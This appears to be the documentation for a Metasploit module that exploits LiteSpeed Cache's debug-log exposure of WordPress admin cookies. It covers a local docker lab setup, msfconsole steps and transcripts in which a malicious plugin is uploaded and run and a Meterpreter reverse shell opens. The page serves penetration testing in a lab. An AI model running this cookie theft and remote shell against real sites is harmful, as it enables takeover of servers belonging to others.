cgranleese-r7
3.9 KiB
Vulnerable Application
This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default. The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.
Setup
Spin up a WordPress container with the following docker-compose file:
version: '3.8'
services:
db:
image: mysql:latest
volumes:
- db_data:/var/lib/mysql
restart: always
environment:
MYSQL_ROOT_PASSWORD: example_root_password
MYSQL_DATABASE: wordpress
MYSQL_USER: wordpress_user
MYSQL_PASSWORD: example_password
wordpress:
depends_on:
- db
image: wordpress:latest
ports:
- "8000:80"
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: wordpress_user
WORDPRESS_DB_PASSWORD: example_password
WORDPRESS_DB_NAME: wordpress
volumes:
- wordpress_data:/var/www/html
volumes:
db_data:
wordpress_data:
Download, install and activate the vulnerable LiteSpeed Cache plugin: https://downloads.wordpress.org/plugin/litespeed-cache.6.3.zip Once installed a LiteSpeed menu bar item should appear on the left hand side of the application. When clicked a drop down should appear. Select "ToolBox", then select "Debug Settings". Then switch the "Debug Log" feature to "On".
Sign out of WordPress and when you reauthenticate your admin cookie will be logged to /wp-content/debug.log
Verification Steps
- Start msfconsole
- Do:
use multi/http/wp_litespeed_cookie_theft - Set the
RHOST,LHOSTandRPORT - Run the module
- Receive a Meterpreter session in the context of the user running the WordPress site.
Scenarios
ARCH_PHP Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
msf exploit(multi/http/wp_litespeed_cookie_theft) > run
[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] One or more potential admin cookies were found
[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/qSNzhabMTP/OiDynMUetY.php...
[*] Sending stage (39927 bytes) to 192.168.1.67
[+] Deleted OiDynMUetY.php
[+] Deleted qSNzhabMTP.php
[+] Deleted ../qSNzhabMTP
[*] Meterpreter session 7 opened (192.168.1.67:4444 -> 192.168.1.67:64935) at 2024-09-11 23:18:14 -0700
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 29292f368fe3
OS : Linux 29292f368fe3 6.10.4-linuxkit #1 SMP PREEMPT_DYNAMIC Mon Aug 12 08:48:58 UTC 2024 x86_64
Meterpreter : php/linux
ARCH_CMD Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
msf exploit(multi/http/wp_litespeed_cookie_theft) > run
[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] One or more potential admin cookies were found
[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload
[*] Preparing payload...
[*] Uploading payload...
[*] Executing the payload at /wp-content/plugins/IVStOPtwuq/WvXecICkgw.php...
[*] Sending stage (3045380 bytes) to 192.168.1.67
[+] Deleted WvXecICkgw.php
[+] Deleted IVStOPtwuq.php
[+] Deleted ../IVStOPtwuq
[*] Meterpreter session 6 opened (192.168.1.67:4444 -> 192.168.1.67:64884) at 2024-09-11 23:14:49 -0700
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer : 172.22.0.3
OS : Debian 12.5 (Linux 6.10.4-linuxkit)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux